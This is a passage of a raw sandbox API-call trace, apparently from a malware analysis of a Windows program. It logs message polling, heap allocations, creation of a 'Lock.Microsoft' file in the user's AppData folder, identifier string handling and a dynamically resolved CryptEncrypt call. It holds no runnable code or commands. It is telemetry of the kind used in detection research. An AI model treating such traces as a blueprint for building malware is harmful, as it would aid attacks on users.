lpMsg=0x8cf708) returned 0 [0124.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.266] GetLastError () returned 0x5 [0124.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0124.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0124.267] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0124.267] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0124.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0124.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0124.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0124.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0124.268] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0124.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0124.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0124.268] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0124.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.269] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0124.269] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0124.269] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0124.269] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.269] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0124.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0124.270] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0124.270] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0124.270] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0124.270] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.270] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0124.270] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.270] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0124.270] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0124.270] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0124.271] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0124.271] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.271] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0124.271] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.271] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0124.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0124.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.271] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0124.271] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.271] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0124.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0124.272] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.272] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.272] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0124.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0124.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aaa300 [0124.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.272] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0124.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0124.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0124.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.273] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69730 [0124.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0124.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 